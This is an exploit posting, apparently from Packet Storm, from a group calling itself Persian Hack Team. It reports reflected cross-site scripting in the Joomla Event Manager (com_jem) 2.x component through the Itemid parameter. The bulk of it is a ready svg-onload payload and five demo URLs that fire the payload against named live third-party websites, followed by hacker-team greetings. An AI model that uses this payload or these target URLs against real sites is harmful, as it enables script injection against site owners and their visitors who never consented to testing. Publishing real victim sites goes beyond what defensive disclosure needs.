Joomla Event Manager component version 2.x suffers from a cross site scripting vulnerability.
b2b22fefa48cf08c718c9172065b478d23024466d877da760ed560e364b738a2######################
# Exploit Title : Joomla Event Manager (com_jem) - Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.joomlaeventmanager.net/download
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 2.x
# Date: 2016/05/11
######################
#
# PoC:
# itemid=[XSS]
# Payload = ">Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team
# Demo :
# https://www.msuhillel.org/index.php?option=com_jem&view=eventslist&Itemid=293%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&limitstart=10
# http://fineartbazar.ir/portal/index.php?option=com_jem&view=venue&id=22:2015-01-05-09-15-50&Itemid=465%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
# http://www.prestodigitators.com/index.php?view=eventslist&task=archive&option=com_jem&Itemid=562%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
# http://www.degrootdiervoeders.nl/index.php?option=com_jem&view=eventslist&Itemid=145%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
# http://www.kuhlo-realschule.de/index.php?option=com_jem&view=eventslist&task=archive&Itemid=72%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Greetz : Milad Hacking & FireKernel And All Persian Hack Team Members
# Homepage : persian-team.ir
######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed